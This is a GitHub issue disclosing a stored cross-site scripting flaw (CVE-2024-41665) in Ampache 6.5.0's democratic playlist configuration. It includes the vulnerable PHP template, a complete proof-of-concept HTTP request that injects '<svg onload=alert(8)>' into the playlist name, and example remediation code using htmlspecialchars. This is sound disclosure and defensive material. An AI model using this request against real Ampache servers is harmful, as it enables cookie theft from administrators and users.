
Stored XSS Vulnerability in Ampache 6.5.0 Democratic Playlist Configuration #61

Open
Hebing123 opened this issue Jul 24, 2024 · 2 comments

Comments

@Hebing123
Owner

Summary

Ampache 6.5.0 is vulnerable to a stored cross-site scripting (XSS) vulnerability. This vulnerability exists in the "Playlists - Democratic - Configure Democratic Playlist" feature. An attacker with Content Manager permissions can set the Name field to . When any administrator or user accesses the Democratic functionality, they will be affected by this stored XSS vulnerability.

Details

The vulnerability is due to insufficient filtering of the $title variable in the /public/templates/show_box_top.inc.php file.
Vulnerable Code:

<?php

declare(strict_types=0);

/**
 * vim:set softtabstop=4 shiftwidth=4 expandtab:
 *
 * LICENSE: GNU Affero General Public License, version 3 (AGPL-3.0-or-later)
 * Copyright Ampache.org, 2001-2023
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Affero General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU Affero General Public License for more details.
 *
 * You should have received a copy of the GNU Affero General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 *
 */

$class = $class ?? 'box';
$title = $title ?? ''; ?>

<div class="<?php echo $class; ?>">
  <div class="box-inside">
    <div class="box-top">
      <div class="box-left-top"></div>
      <div class="box-right-top"></div>
    </div>
    <?php if ($title) { ?>
       <h3 class="box-title"><?php echo $title; ?></h3>
      <?php } ?>
    <div class="box-content clearfix">

PoC

The following HTTP request demonstrates the exploitation of this vulnerability.

POST /democratic.php?action=create HTTP/1.1
Host: 192.168.0.10:1050
Content-Length: 678
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.10:1050
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypldFGg4VEESHNAru
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.10:1050/democratic.php?action=manage
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: 19610f92b847c9ad674caaf9d83e7955_ssl=1c40587b-3702-4aea-8be2-ea4050f38752.0bFqmuq06lhqH0o6eIevY88t7Fo; ampache=qinlqrvkl4oolcf39tjuqbb8sm; ampache_user=admin; ampache_lang=fr_FR
Connection: close

------WebKitFormBoundarypldFGg4VEESHNAru
Content-Disposition: form-data; name="name"

<svg onload=alert(8)>
------WebKitFormBoundarypldFGg4VEESHNAru
Content-Disposition: form-data; name="democratic"

2
------WebKitFormBoundarypldFGg4VEESHNAru
Content-Disposition: form-data; name="cooldown"

0
------WebKitFormBoundarypldFGg4VEESHNAru
Content-Disposition: form-data; name="level"

25
------WebKitFormBoundarypldFGg4VEESHNAru
Content-Disposition: form-data; name="make_default"

1
------WebKitFormBoundarypldFGg4VEESHNAru
Content-Disposition: form-data; name="form_validation"

623b1b7e60c4f1f25810c1f84b2f7d3e
------WebKitFormBoundarypldFGg4VEESHNAru--

Impact

An attacker with Content Manager permissions can exploit this vulnerability to obtain the cookies of any user or administrator who accesses the democratic.php file.
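As an added illustration of the fix the Details section calls for (example code, not Ampache's own), the unescaped echo from show_box_top.inc.php is shown beside a hardened version that HTML-encodes $title before it is placed in the h3; the function names are made up for this example.

```php
<?php
// Added example, not Ampache's own code. Compares the unescaped echo in
// show_box_top.inc.php with an output-encoded version of the same markup.

declare(strict_types=1);

// Vulnerable form: $title is written into the HTML verbatim, so any markup
// stored in the democratic playlist name is interpreted by the browser.
function render_box_title_unsafe(string $title): string
{
    return '<h3 class="box-title">' . $title . '</h3>';
}

// Hardened form: encode every character that has meaning in HTML before it
// reaches the template. ENT_QUOTES also covers attribute contexts, and
// ENT_SUBSTITUTE avoids returning an empty string on malformed UTF-8.
function render_box_title_safe(string $title): string
{
    $escaped = htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<h3 class="box-title">' . $escaped . '</h3>';
}

// Self-check a reviewer can run: after encoding, no tag from user data may
// survive as a tag in the output. Returns true when the hardened renderer
// neutralises the payload and the unsafe one does not.
function encoding_blocks_payload(string $payload): bool
{
    $unsafe = render_box_title_unsafe($payload);
    $safe   = render_box_title_safe($payload);
    return str_contains($unsafe, $payload) && !str_contains($safe, '<svg');
}

// Constructed input: the same name value the PoC request stores.
$name = '<svg onload=alert(8)>';

echo render_box_title_unsafe($name), PHP_EOL;
echo render_box_title_safe($name), PHP_EOL;

if (!encoding_blocks_payload($name)) {
    fwrite(STDERR, "encoding check failed\n");
    exit(1);
}
```

The same audit applies to every other `echo $variable` inside public/templates: any value that originates from a user-editable field needs the same encoding at the point it is written into HTML.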

@Hebing123
Owner Author

GHSA-cp44-89r2-fxph

@Hebing123
Owner Author

Hebing123 commented Jul 24, 2024

CVE-2024-41665
